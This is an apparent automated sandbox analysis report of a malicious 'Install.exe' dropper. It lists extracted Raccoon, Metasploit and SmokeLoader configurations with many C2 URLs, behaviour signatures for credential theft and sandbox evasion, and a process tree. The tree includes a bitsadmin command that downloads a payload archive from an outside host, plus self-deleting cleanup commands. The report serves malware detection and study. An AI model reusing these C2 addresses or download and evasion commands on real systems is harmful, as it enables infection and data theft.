Resubmissions

24-04-2021 06:39

210424-lmjja25q22 10

23-04-2021 19:10

210423-f6mvfx4yyx 10

23-04-2021 19:10

210423-3qnl3etjca 10

23-04-2021 18:20

210423-4keqsccdba 10

23-04-2021 13:38

210423-1f2d5v8a2s 10

23-04-2021 04:53

210423-eenyvz5kqj 10

23-04-2021 04:53

210423-svr8rrwggs 10

23-04-2021 04:53

210423-95h13plc2x 10

22-04-2021 19:11

210422-6s1zd291s6 10

22-04-2021 19:05

210422-dsvj9bzkvn 10

Analysis

  • max time kernel
    1803s
  • max time network
    1797s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    23-04-2021 19:10

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Nirsoft 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 40 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:296
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2728
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2720
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2712
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2420
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2400
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1868
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1408
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1396
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1176
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1100
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1036
                      • C:\Users\Admin\AppData\Roaming\jvvbvtt
                        C:\Users\Admin\AppData\Roaming\jvvbvtt
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:5744
                        • C:\Users\Admin\AppData\Roaming\jvvbvtt
                          C:\Users\Admin\AppData\Roaming\jvvbvtt
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:4448
                      • C:\Users\Admin\AppData\Roaming\ruvbvtt
                        C:\Users\Admin\AppData\Roaming\ruvbvtt
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:2436
                      • C:\Users\Admin\AppData\Roaming\jvvbvtt
                        C:\Users\Admin\AppData\Roaming\jvvbvtt
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:1584
                        • C:\Users\Admin\AppData\Roaming\jvvbvtt
                          C:\Users\Admin\AppData\Roaming\jvvbvtt
                          3⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:2128
                      • C:\Users\Admin\AppData\Roaming\ruvbvtt
                        C:\Users\Admin\AppData\Roaming\ruvbvtt
                        2⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:1724
                      • C:\Users\Admin\AppData\Roaming\jvvbvtt
                        C:\Users\Admin\AppData\Roaming\jvvbvtt
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:2736
                        • C:\Users\Admin\AppData\Roaming\jvvbvtt
                          C:\Users\Admin\AppData\Roaming\jvvbvtt
                          3⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:4380
                      • C:\Users\Admin\AppData\Roaming\ruvbvtt
                        C:\Users\Admin\AppData\Roaming\ruvbvtt
                        2⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5436
                    • C:\Users\Admin\AppData\Local\Temp\Install.exe
                      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:488
                      • C:\Users\Admin\AppData\Local\Temp\is-BB27I.tmp\Install.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-BB27I.tmp\Install.tmp" /SL5="$400F6,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:1000
                        • C:\Users\Admin\AppData\Local\Temp\is-394M7.tmp\Ultra.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-394M7.tmp\Ultra.exe" /S /UID=burnerch1
                          3⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:632
                          • C:\Program Files\Common Files\DRMRZTJXHS\ultramediaburner.exe
                            "C:\Program Files\Common Files\DRMRZTJXHS\ultramediaburner.exe" /VERYSILENT
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:1532
                            • C:\Users\Admin\AppData\Local\Temp\is-6P68Q.tmp\ultramediaburner.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-6P68Q.tmp\ultramediaburner.tmp" /SL5="$301D6,281924,62464,C:\Program Files\Common Files\DRMRZTJXHS\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of WriteProcessMemory
                              PID:3796
                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                6⤵
                                • Executes dropped EXE
                                PID:3852
                          • C:\Users\Admin\AppData\Local\Temp\6a-4a51a-ec2-839ba-84db2d32ac855\Qezhaefitovi.exe
                            "C:\Users\Admin\AppData\Local\Temp\6a-4a51a-ec2-839ba-84db2d32ac855\Qezhaefitovi.exe"
                            4⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:636
                          • C:\Users\Admin\AppData\Local\Temp\3b-afee4-f6b-acb82-75f41a310aedd\Jikejaeshupi.exe
                            "C:\Users\Admin\AppData\Local\Temp\3b-afee4-f6b-acb82-75f41a310aedd\Jikejaeshupi.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3808
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bur5qrt4.inc\instEU.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4128
                              • C:\Users\Admin\AppData\Local\Temp\bur5qrt4.inc\instEU.exe
                                C:\Users\Admin\AppData\Local\Temp\bur5qrt4.inc\instEU.exe
                                6⤵
                                • Executes dropped EXE
                                PID:4356
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\40yxuyxd.y55\md1_1eaf.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2652
                              • C:\Users\Admin\AppData\Local\Temp\40yxuyxd.y55\md1_1eaf.exe
                                C:\Users\Admin\AppData\Local\Temp\40yxuyxd.y55\md1_1eaf.exe
                                6⤵
                                • Executes dropped EXE
                                • Checks whether UAC is enabled
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4272
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zpifxbbz.phr\google-game.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:5204
                              • C:\Users\Admin\AppData\Local\Temp\zpifxbbz.phr\google-game.exe
                                C:\Users\Admin\AppData\Local\Temp\zpifxbbz.phr\google-game.exe
                                6⤵
                                  PID:5536
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                    7⤵
                                    • Loads dropped DLL
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:6080
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vjr2bb4n.afb\y1.exe & exit
                                5⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5128
                                • C:\Users\Admin\AppData\Local\Temp\vjr2bb4n.afb\y1.exe
                                  C:\Users\Admin\AppData\Local\Temp\vjr2bb4n.afb\y1.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:5284
                                  • C:\Users\Admin\AppData\Local\Temp\EVd2wNLPfH.exe
                                    "C:\Users\Admin\AppData\Local\Temp\EVd2wNLPfH.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Modifies system certificate store
                                    PID:2296
                                    • C:\Users\Admin\AppData\Roaming\1619212573879.exe
                                      "C:\Users\Admin\AppData\Roaming\1619212573879.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619212573879.txt"
                                      8⤵
                                      • Executes dropped EXE
                                      PID:4664
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\EVd2wNLPfH.exe"
                                      8⤵
                                        PID:5456
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping 127.0.0.1 -n 3
                                          9⤵
                                          • Runs ping.exe
                                          PID:4944
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\vjr2bb4n.afb\y1.exe"
                                      7⤵
                                        PID:5796
                                        • C:\Windows\SysWOW64\timeout.exe
                                          timeout /T 10 /NOBREAK
                                          8⤵
                                          • Delays execution with timeout.exe
                                          PID:4812
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\msxu3ixg.r4q\inst.exe & exit
                                    5⤵
                                      PID:2228
                                      • C:\Users\Admin\AppData\Local\Temp\msxu3ixg.r4q\inst.exe
                                        C:\Users\Admin\AppData\Local\Temp\msxu3ixg.r4q\inst.exe
                                        6⤵
                                        • Executes dropped EXE
                                        PID:5904
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hsybhhno.ynq\SunLabsPlayer.exe /S & exit
                                      5⤵
                                        PID:4876
                                        • C:\Users\Admin\AppData\Local\Temp\hsybhhno.ynq\SunLabsPlayer.exe
                                          C:\Users\Admin\AppData\Local\Temp\hsybhhno.ynq\SunLabsPlayer.exe /S
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Drops file in Program Files directory
                                          PID:5248
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1"
                                            7⤵
                                              PID:5404
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1"
                                              7⤵
                                                PID:5172
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:4028
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:5200
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:5072
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:6036
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Drops file in Program Files directory
                                                          • Suspicious use of SetWindowsHookEx
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:5536
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1"
                                                        7⤵
                                                        • Checks for any installed AV software in registry
                                                        PID:5780
                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                        7⤵
                                                        • Download via BitsAdmin
                                                        PID:5916
                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -poeWnrHrvM7MCbDA -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Drops file in Program Files directory
                                                        PID:2392
                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pjlLAVBBbnyzh2Zt -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:4100
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:4724
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:5608
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:5736
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:4244
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:4176
                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\CWUXzWKCkA\CWUXzWKCkA.dll" CWUXzWKCkA
                                                                  7⤵
                                                                  • Loads dropped DLL
                                                                  PID:2804
                                                                  • C:\Windows\system32\rundll32.exe
                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\CWUXzWKCkA\CWUXzWKCkA.dll" CWUXzWKCkA
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    • Drops file in System32 directory
                                                                    PID:4076
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:5652
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1"
                                                                    7⤵
                                                                    • Drops file in Program Files directory
                                                                    PID:5520
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1"
                                                                    7⤵
                                                                    • Drops file in Program Files directory
                                                                    PID:5612
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:5912
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:4212
                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:1892
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t3ocab2b.1rf\GcleanerWW.exe /mixone & exit
                                                                    5⤵
                                                                      PID:6012
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\udwkobsk.pbv\toolspab1.exe & exit
                                                                      5⤵
                                                                        PID:2888
                                                                        • C:\Users\Admin\AppData\Local\Temp\udwkobsk.pbv\toolspab1.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\udwkobsk.pbv\toolspab1.exe
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:5004
                                                                          • C:\Users\Admin\AppData\Local\Temp\udwkobsk.pbv\toolspab1.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\udwkobsk.pbv\toolspab1.exe
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:4828
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f0ds3afe.qyz\c7ae36fa.exe & exit
                                                                        5⤵
                                                                          PID:5104
                                                                          • C:\Users\Admin\AppData\Local\Temp\f0ds3afe.qyz\c7ae36fa.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\f0ds3afe.qyz\c7ae36fa.exe
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:3804
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vcesu1g1.gf5\app.exe /8-2222 & exit
                                                                          5⤵
                                                                            PID:5252
                                                                            • C:\Users\Admin\AppData\Local\Temp\vcesu1g1.gf5\app.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\vcesu1g1.gf5\app.exe /8-2222
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:1680
                                                                              • C:\Users\Admin\AppData\Local\Temp\vcesu1g1.gf5\app.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\vcesu1g1.gf5\app.exe" /8-2222
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Modifies data under HKEY_USERS
                                                                                PID:5352
                                                                  • \??\c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                    1⤵
                                                                    • Suspicious use of SetThreadContext
                                                                    • Modifies registry class
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:1144
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                      2⤵
                                                                      • Drops file in System32 directory
                                                                      • Checks processor information in registry
                                                                      • Modifies data under HKEY_USERS
                                                                      • Modifies registry class
                                                                      PID:5740
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                    1⤵
                                                                    • Drops file in Windows directory
                                                                    • Modifies Internet Explorer settings
                                                                    • Modifies registry class
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:1684
                                                                  • C:\Windows\system32\browser_broker.exe
                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                    1⤵
                                                                    • Modifies Internet Explorer settings
                                                                    PID:4296
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                    1⤵
                                                                    • Modifies registry class
                                                                    • Suspicious behavior: MapViewOfSection
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:4184
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                    1⤵
                                                                    • Modifies Internet Explorer settings
                                                                    • Modifies registry class
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4524
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                    1⤵
                                                                    • Modifies registry class
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4760
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                    1⤵
                                                                    • Modifies registry class
                                                                    PID:5124
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                    1⤵
                                                                    • Modifies registry class
                                                                    PID:4628
                                                                  • \??\c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                    1⤵
                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                    PID:6100
                                                                  • C:\Users\Admin\AppData\Local\Temp\1D77.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\1D77.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Drops startup file
                                                                    • NTFS ADS
                                                                    PID:6004
